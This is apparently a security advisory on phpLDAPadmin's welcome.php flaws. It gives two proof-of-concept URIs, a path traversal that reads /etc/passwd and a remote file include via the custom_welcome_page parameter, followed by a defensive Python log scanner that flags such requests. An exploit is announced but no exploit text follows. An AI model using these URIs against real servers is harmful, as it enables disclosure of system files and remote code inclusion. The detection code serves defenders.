PHPLDAPAdmin Welcome.PHP Multiple Vulnerabilities

No exploit is required.

The following proof-of-concept URIs are available:
http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=http://www.example.com/[malicious code]
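
For defenders reviewing web server logs, the following added example (not part of the original advisory, and not phpLDAPadmin code) flags requests that pass a traversal sequence or a remote URL in custom_welcome_page, the two forms shown above. The log lines are constructed samples, and the names classify, scan and fully_decode are hypothetical helpers.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); not from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /phpldapadmin/welcome.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=http://host.example/x.txt HTTP/1.1" 200 90',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=%252e%252e%252fconfig.php HTTP/1.1" 200 77',
    '192.0.2.14 - - [01/Jan/2010:10:00:20 +0000] "GET /phpldapadmin/tree.php?server_id=0 HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*:', re.I)  # http:, ftp:, php:, data: ...

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return None for lines of no interest, else a reason string."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith('/welcome.php'):
        return None
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        if key != 'custom_welcome_page':
            continue
        value = fully_decode(raw).replace('\\', '/')
        if SCHEME_RE.match(value) or value.startswith('//'):
            return 'remote-include'
        if '..' in value.split('/') or value.startswith('/') or '\x00' in value:
            return 'path-traversal'
        # Assumption: any request-supplied value for this parameter merits review.
        return 'parameter-present'
    return None

def scan(lines):
    """Return (client address, reason) for every flagged log line."""
    return [(line.split()[0], reason) for line in lines if (reason := classify(line))]
```

scan(SAMPLE_LOG) reports the three requests carrying the parameter and skips the two ordinary ones.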

Johnnie Walker <whisky[at]bsdmail[d0t]org> has supplied the following exploit for the remote command execution vulnerability:


 

Copyright 2010, SecurityFocus